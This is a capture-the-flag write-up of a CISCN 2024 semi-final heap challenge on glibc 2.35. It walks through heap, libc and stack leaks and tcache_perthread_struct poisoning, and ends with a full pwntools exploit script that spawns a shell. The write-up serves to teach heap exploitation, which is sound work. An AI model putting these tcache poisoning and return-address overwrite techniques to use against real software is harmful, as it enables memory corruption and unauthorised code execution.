CISCN 2024 semi-final - An interesting heap exploitation by poisoning tcache_perthread_struct

This is the first time when I have developed a heap exploitation on tcache. Even though a huge number of guys have agreed the difficulty in heap exploitation, I feel things are becoming way easier only if one has a solid understanding of heap and masters debugging. Not only does this post explains a solution, but also uncovers the pains that I went through while developing an exploit script. The attachment could be downloaded here.

Resolving the application logic

Reversing the given binary and checking the version of libc

What one needs to do first is to reverse engineer the application logic of the given binary, and check the version of libc in order to tell available exploitation techniques from already patches vulnerabilities in old libc distributions. Load this binary into Ghidra. We could find that its logic is very typical because there are five functions, including add, delete, edit, and show. However, A function located at 0x101495 catches my attention, which I name as print_shell_addr in Ghidra, and it plays a big role in poisoning heap. Its decompiled code looks like the following:

void print_shell_addr(void)
{
  printf("magic address: %p\n",get_shell);
  printf("edit data:");
  read(0,ptr_chunk,0x10);
  return;
}
void get_shell(void)
{
  system("/bin/sh");
  return;
}

Here, it is clear that the challenge designer would like us to store the address of get_shell somewhere else, and attempt to get it executed. Before we dive into auditing other basic functions, we need to check out the version of the given libc binary. As the preceeding result shown, the version is 2.35.

$ strings libc.so.6 | grep "ubuntu"
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.7) stable release version 2.35.
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.

Auditing

Take a look at menu:

void menu(void)
{
  puts("magic heap has 4 choice : \nadd\ndelete\nshow\nedit");
  return;
}

Then turn to add:

void add(void)
{
  int iVar1;
  
  puts("which one you choose?");
  iVar1 = choice();
  if (iVar1 == 1) {
    printf("size:");
    iVar1 = choice();
    ptr_chunk = (undefined *)malloc((long)iVar1);
  }
  else {
    malloc(0x4f0);
  }
  return;
}

This function allows users to allocate a chunk of specified size, and stores its pointer in a global variable ptr_chunk. Furthermore, I had no idea about the reason why malloc(0x4f0); serving non-one choices, has been put here while checking it firstly. However, this is very crucial and I will cover in later sections.

delete is easy to be understood:

void del(void)
{
  free(ptr_chunk);
  puts("delete success!");
  return;
}

The show function does not print the content in the allocated buffer straightaway, but actually encodes it first then prints the encoded content. Nontheless, it is quite easy to decode and I will cover the decode algorithm in later sections when necessary.

void show(void)
{
  long in_FS_OFFSET;
  uint data;
  int idx;
  if (ptr_chunk != (undefined *)0x0) {
    printf("the data:");
    for (idx = 0; idx < 7; idx = idx + 1) {
      data = idx + 0x99U ^ (int)(char)ptr_chunk[idx];
      write(1,&data,1);
    }
  }
  return;
}

Finally, check edit:

void edit(void)
{
  printf("edit data:");
  read(0,ptr_chunk,8);
  return;
}

It is worth to mention that only first 8 bytes are allowed to modify.

Vulnerabilities

As far as I audit in the previous section, there is a relatively obvious vulnerability - use after free (UAF) and double free. In other words, one could allocate a heap buffer then modify its first 8 bytes after freeing the buffer. Moreover, this version of libc has enabled tcache to facilitate heap management in each thread without a need of mixing allocated chunks of other threads at the same management namespace.

Allocate a chunk of size 24 bytes, then free it:

magic heap has 4 choice : 
add
delete
show
edit
1
which one you choose?
1
size:24
magic heap has 4 choice : 
add
delete
show
edit
2
delete success!
pwndbg> bins
tcachebins
0x20 [  1]: 0x55555555b2a0 ◂— 0x0
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty

It could be seen in a way that our previously allocated chunk has been placed into a bin of size 0x20 in tcache. Furthermore, being able to modify first 16 bytes in a freed chunk allows us to accomplish double free on tcache.

By referring to another write-up, the author claimed there are many approaches to exploit in libc 2.35 and only achieved exploitation by overwriting a return address at the stack to intercept control flow to get a shell. This post will also use the same approach with a slightly different implementation.

Uncovering tcache and tcache_perthread_struct

What does it look like when we free a tcache chunk?

typedef struct tcache_entry
{
  struct tcache_entry *next;
  struct tcache_perthread_struct *key;
} tcache_entry;

As the above structure shown, a freed tcacahe chunk is stored in an entry of specific size, which consists of a pointer to the next freed chunk and a key for checking double free and throwing an exception. Hence, we can see that tcache is implemented as a singly-linked list, and an entry of each bin will maintain its own list once a freed chunk has been placed into that bin.

Furthermore, each entry is managed by a higher level structure, called tcache_perthread_struct. It maintains a record of available chunk for all bins and their corresponding pointers.

For simplicity, I refer to the slide made by Yan in his pwn colleage course to demonstrate this structure:

For example, the entry of size 16 bytes now maintains two freed chunks in its list and the record of count is shown as 2 accordingly.

Turning to tcache_perthread_struct, this is very important for exploitation. It structure is taken from source code:

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

Notably, the type of count record is uint16_t, which we will overwrite this value in our exploit.

There are more basics than we see here. I am going to present them when necessary as this makes a stronger storytelling.

Leaking essential addresses

Typically, whenever we deal with heap challenges, the very first step is to leak information we need. In this case, it should be heap base address, from which we could overwrite tcache_perthread_struct, and libc base address, from which we could identify where stack lives in by accessing environ variable.

Leaking heap

Leaking heap base address is way easier that we just need to free an allocated tcache chunk.

pwndbg> x/10xg 0x55555555b2a0
0x55555555b2a0:	0x000000055555555b	0xf91a1fa7a1b5da87
pwndbg> vmmap heap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
             Start                End Perm     Size Offset File
►   0x55555555b000     0x55555557c000 rw-p    21000      0 [heap]
    0x7ffff7d8f000     0x7ffff7d92000 rw-p     3000      0 [anon_7ffff7d8f]

Here, the heap base address stored in a freed chunk is right shifted by 12 bits. Let us take a look at its source code and understand why this address is placed that way:

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;
  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

As shown above, e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]); is supposed to set up next pointer while freeing the current chunk. Moreover, the address of e->next is landing within heap, which is probably 0x55555555bxxx in this case. However, tcache->entries[tc_idx] is null as it just has been initialized. PROTECT_PTR is used for safe-linking to check double free. It masks the “next” pointers of the lists’ chunks and perform allocation alignment checks on them.

#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))

Hence, the above next pointer is finally calculated as PROTECT_PTR(0x55555555bxxx, 0), which is 0x000000055555555b. We could left shift its encoded address to leak this heap base address.

Leaking libc by unsorted_bin

Leaking libc had blocked my progress for a while since I though tcache will somehow leak this information out. By following this methodology, I looked around tcache section in CTFWiki to get an answer. However, what it has written down is not this case because it leaks libc base address by simply flooding an entry in tcache.

Finally, I understand how malloc(0x4f0); in the add function plays a role to leak libc. Basically, this program allows us to allocate a chunk of whatever size. If we could free a chunk to unsorted_bin, then know where main_arena is, which helps us calculate libc base address because there is a fixed offset in between. When a heap is initilized, unsorted_bin can not be empty and should point to itself in fd and bk pointers:

                  /* We cannot assume the unsorted list is empty and therefore
                     have to perform a complete insert here.  */
                  bck = unsorted_chunks (av);
                  fwd = bck->fd;
		  if (__glibc_unlikely (fwd->bk != bck))
		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
                  remainder->bk = bck;
                  remainder->fd = fwd;
                  bck->fd = remainder;
                  fwd->bk = remainder;

This is why we could see when only one freed chunk is in the unsorted list, its fd and bk pointers both point to the address of main_arena plus an offset.

At the very beginning, I actually made a mistake before got the libc address. I directly allocated a chunk of big size, then freed it. I was sort of confused why it had not been placed into unsorted_bin. Finally, I figured it out when checking source code:

        /*
          If the chunk borders the current high end of memory,
          consolidate into top
        */
        else {
            size += nextsize;
            set_head(p, size | PREV_INUSE);
            av->top = p;
            check_chunk(av, p);
        }

Because of the freed chunk next to top chunk, ptmalloc made memory consolidation for both of them. That is to say, after I freed it, this chunk was returned to top chunk and became a part of it.

Hence, using malloc(0x4f0); after allocating a big chunk would stop this consolidation from happening.

magic heap has 4 choice : 
add
delete
show
edit
1
which one you choose?
1   
size:2000
magic heap has 4 choice : 
add
delete
show
edit
1
which one you choose?
2
magic heap has 4 choice : 
add
delete
show
edit
2
delete success!
magic heap has 4 choice : 
add
delete
show
edit
pwndbg> bins 
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.

tcachebins
empty
fastbins
empty
unsortedbin
all: 0x55555555b290 —▸ 0x7ffff7facce0 ◂— 0x55555555b290
smallbins
empty
largebins
empty
pwndbg> vmmap 0x00007ffff7facce0
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
             Start                End Perm     Size Offset File
    0x7ffff7fa8000     0x7ffff7fac000 r--p     4000 215000 /home/libc.so.6
►   0x7ffff7fac000     0x7ffff7fae000 rw-p     2000 219000 /home/libc.so.6 +0xce0
    0x7ffff7fae000     0x7ffff7fbd000 rw-p     f000      0 [anon_7ffff7fae]

It is worthwhile to mention that main_arena is a global variable in libc’s data section, so this is why we found this address in libc space rather than heap.

Poisoning tcache_pthread_struct

As mentioned previously, print_shell_addr offers us a chance to double free a tcache chunk (modify key field). Why do we need to poison tcacahe_pthread_struct, instead of leaking stack then overwriting a function return address?

Double free is an one-time use if one leaks stack at this step. What we aim to do is not just leak stack, but allocate a chunk that starts at a certain function return address, then overwrite its value. Otherwise, one only leaks stack but cannot preceed by any allocation at arbitrary address in stack.

Hence, the primary point to poison tcache_pthread_struct is to allow as more chances of double free as possible.

pwndbg> vmmap heap                                                          
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA         
             Start                End Perm     Size Offset File
►   0x6194fc568000     0x6194fc589000 rw-p    21000      0 [heap]
    0x7f918f70b000     0x7f918f70e000 rw-p     3000      0 [anon_7f918f70b]
pwndbg> x/10xg 0x6194fc568000
0x6194fc568000: 0x0000000000000000      0x0000000000000291
0x6194fc568010: 0x0000000200020002      0x0000000000000000
0x6194fc568020: 0x0000000000000000      0x0000000000000000

So, it could be seen that the starting address of tcache_pthread_struct is 0x6194fc568010. Its first 8 bytes involves count fields for the bins of size from 0x20 to 0x50. For this challenge, the modification on bins of size 0x30 and 0x40 totally suffices. Therefore, we could perform double free twice.

Leaking stack by environ

environ variable in libc data or bss section stores a pointer to environment variables of a running program. If one has access to this information, then could relocate the stack base a bit easier after printing this pointer. The following python code snippets present a way of leaking environ then relocating a return address to be overwritten.

# leak libc
add(2000,1)
add(0,2)
delete()
libc_base = show()
libc_base = (unpack(decrypt(libc_base), 'all', endian='little', sign=False) & ~((1<<12)-1) ) - 0x21a000
success("libc_base: " + hex(libc_base))

environ = libc_base + libc.symbols["environ"]
success("environ: " + hex(environ))

shell_addr = leak_and_double_free(heap_base)
shell_addr = int(shell_addr, 0)
success("shell_addr: " + hex(shell_addr))

# tcache posioning pthreat_struct + 0x10, which is the area storing the count of each bin in size
edit(p64((  (heap_base >> 12)  ^ (heap_base+0x10 )  )))

# allocate the tail chunk pointing to pthread_structure to modify counts, so as to allow the use of next field
add(56, 1)
delete()

# change counts for bins of size from 0x20 to 0x40 after getting the chunk at tcache_perthread_struct
add(24, 1)
add(24, 1)
edit(p64(  0x000200020002 ))

# bin 0x30 is used to leak stack
add(32, 1)
delete()
edit(p64( (heap_base >> 12)  ^ environ ))

add(32, 1)
add(32, 1)
stack_addr = unpack(decrypt(show()), 'all', endian='little', sign=False)
success("environ:" + hex(stack_addr))

Whenever one receives information from show function, needs to decode it (never mind that I has named it differently in the script lol). The decoding algorithm is demonstrated below:

def decrypt(data):
    decrypted = []
    for i in range(0, 7):
        decrypted.append(data[i] ^ 0x99 + i)
    return bytes(decrypted)

After previous steps, one might be able to overwrite a function return address. The address of environ minus 0x140 () is a good candidate, pointing to where choice function returns to.

        00101510 e8 54 fd        CALL       choice
                 ff ff
        00101515 89 45 fc        MOV        dword ptr [RBP + local_c],EAX

Let us validate in pwndbg:

───────────────────────────────────────[ BACKTRACE ]────────────────────────────
 ► 0   0x767c99abd7e2 read+18                                                                                                                     
   1   0x601ed3da729a                                                                                                                                    
   2   0x601ed3da7515                                                                                                                                    
   3   0x767c999d2d90                                                                                                                                    
   4   0x767c999d2e40 __libc_start_main+128

pwndbg> x/10xg 0x767c99bcb200
0x767c99bcb200 <environ>:       0x00007ffe1c699788

pwndbg> vmmap 0x00007ffe1c699788
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
             Start                End Perm     Size Offset File
    0x767c99c0e000     0x767c99c10000 rw-p     2000  39000 /home/ld-linux-x86-64.so.2
►   0x7ffe1c67b000     0x7ffe1c69c000 rw-p    21000      0 [stack] +0x1e788

pwndbg> vmmap 0x7ffe1c699648                                                                                                                             
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA                                                                                                        
             Start                End Perm     Size Offset File
    0x767c99c0e000     0x767c99c10000 rw-p     2000  39000 /home/ld-linux-x86-64.so.2
►   0x7ffe1c67b000     0x7ffe1c69c000 rw-p    21000      0 [stack] +0x1e648

Well, the offset between environ and where choice function returns to is indeed 0x140. Now, let us allocate a chunk at this specific address and kill the game!

# activate bin of size 0x40 because 0x20 is not usable at all. If you allocate, the program will crash
add(56,1)
delete()

# experimental step
edit(p64( (heap_base >> 12)  ^ (stack_addr-0x140) ))
add(56, 1)
add(56, 1)

Ohh, a crash arises and ptmalloc is going to panic by throwing an unalign error if you do so.

malloc(): unaligned tcache chunk detected

What is going wrong? Well, as this error illustrated, the address 0x7ffe1c699648 we allocated was not aligned by 0x10. How could we do then? The solution from another writeup is to manipulate the global variable ptr_chunk that stores a pointer to a newly allocated chunk. Moreover, its offset from binary base address is 0x4040, which is located at bss section of the given binary.

ptr_chunk
00104040 00 00 00        addr       00000000
         00 00 00 
         00 00

In detail, once one has a control over ptr_chunk by allocating a chunk at its address, could overwrite its value to a specific address in stack by calling edit function, then invoke edit twice to change its value to the address of a shell. Indeed, it is quite challenging to have this solution in mind during the contest.

# make use of the global var in bss section so as to directly manipulate stack without having unaligned tcache alloc error
edit(p64( (heap_base >> 12)  ^ (bin_base + 0x4040 ) ))
add(56,1)
add(56,1)
edit(p64(stack_addr-0x140))
edit(p64(shell_addr))

However, our exploit did not succeed and the program crashed because of the instruction movaps that does not accept non-aligned value in rsp:

0x7c830a7e4973    movaps xmmword ptr [rsp], xmm1
───────────────────────────────────────[ STACK ]───────────────────────────────
00:0000│ rsp 0x7ffeb484b2d8 ◂— 0x7c8300000000

This rsp value at this crash moment was carrying forward from shell. The better approach is to skip a push instruction at the beginning of shell.

                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined get_shell()
             undefined         AL:1           <RETURN>
                             get_shell                                       XREF[4]:     5-print_shell_addr:0010149d(*), 
        001012be f3 0f 1e fa     ENDBR64
        001012c2 55              PUSH       RBP
        001012c3 48 89 e5        MOV        RBP,RSP
        001012c6 48 8d 05        LEA        RAX,[s_/bin/sh_00102008]                         = "/bin/sh"
                 3b 0d 00 00

We could skip five bytes then direct get the program executing from 001012c3.

Taking over execution flow

After fixing the above issue, the modified script is in the following:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template my_heap
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or 'my_heap')
context.terminal = ["tmux", "splitw", "-v"]
#context.log_level = 'debug'
# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Full RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      PIE enabled

io = start()

def add(size, choice=1):
    io.recvuntil(b"edit")
    io.sendline(b"1")
    io.recvuntil(b"which one you choose?")
    if choice == 1:
        io.sendline(b"1")
        io.recvuntil(b"size:")
        io.sendline(str(size).encode())
    else:
        io.sendline(b"2")

def delete():
    io.recvuntil(b"edit")
    io.sendline(b"2")

def edit(data: bytes):
    io.recvuntil(b"edit")
    io.sendline(b"4")
    io.recvuntil(b"edit data:")
    io.send(data[0:8])

def show():
    io.recvuntil(b"edit")
    io.sendline(b"3")
    io.recvuntil(b"the data:")
    chunk_data = io.recv(7)
    return chunk_data

def leak_and_double_free(heap_base):
    add(24,1)
    delete()
    io.recvuntil(b"edit")
    io.sendline(b"5")
    io.recvuntil(b"magic address: ")
    shell = io.recvuntil("\n")[:-1]
    io.recvuntil(b"edit data:")
    key = 0
    next_tcache = ((heap_base >> 12) ^ 0).to_bytes(8, "little")
    io.sendline(next_tcache)
    delete()
    return shell

def decrypt(data):
    decrypted = []
    for i in range(0, 7):
        decrypted.append(data[i] ^ 0x99 + i)
    return bytes(decrypted)


binary = ELF("my_heap")
libc = ELF("libc.so.6")

# 0x20 bin
add(24,1)
delete()

# 0x30 bin
add(32,1)
delete()

heap_base = show()
heap_base = unpack(decrypt(heap_base), 'all', endian='little', sign=False) << 12
success("heap_addr: " + hex(heap_base))


# leak libc
add(2000,1)
add(0,2)
delete()
libc_base = show()
libc_base = (unpack(decrypt(libc_base), 'all', endian='little', sign=False) & ~((1<<12)-1) ) - 0x21a000
success("libc_base: " + hex(libc_base))

environ = libc_base + libc.symbols["environ"]
success("environ: " + hex(environ))


shell_addr = leak_and_double_free(heap_base)
shell_addr = int(shell_addr, 0)
success("shell_addr: " + hex(shell_addr))

# tcache posioning pthreat_struct + 0x10, which is the area storing the count of each bin in size
edit(p64((  (heap_base >> 12)  ^ (heap_base+0x10 )  )))

# allocate the tail chunk pointing to pthread_structure to modify counts, so as to allow the use of next field

add(56, 1)
delete()

add(24, 1)
add(24, 1)
edit(p64(  0x000200020002 ))


add(32, 1)
delete()
edit(p64( (heap_base >> 12)  ^ environ ))

add(32, 1)
add(32, 1)
stack_addr = unpack(decrypt(show()), 'all', endian='little', sign=False)
success("stack:" + hex(stack_addr))


add(56,1)
delete()

bin_base = shell_addr - 0x2be - 0x1000
success("binary_base: " + hex(bin_base))

# make use of the global var in bss section so as to directly manipulate stack without having unaligned tcache alloc error
edit(p64( (heap_base >> 12)  ^ (bin_base + 0x4040 ) ))

add(56,1)
add(56,1)
edit(p64(stack_addr-0x140))
gdb.attach(io, gdbscript=f'''
b *{bin_base + 0x1492}
continue
''')
edit(p64(shell_addr+5))
io.interactive()

Run it and get a shell:

$ ls
exploit.py  ld-linux-x86-64.so.2  libc.so.6  my_heap  sploit.py
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root

Refercence

[1] https://docs.google.com/presentation/d/13NbUlNvj1Rm-Cc_E_Crp678c-mgzCi0BYfzXIzFB3zI/edit#slide=id.g47fd1f5b33_0_175

[2] https://codebrowser.dev/glibc/glibc/malloc/malloc.c.html#319size

[3] https://ctf-wiki.org/en/pwn/linux/user-mode/heap/ptmalloc2/tcache-attack/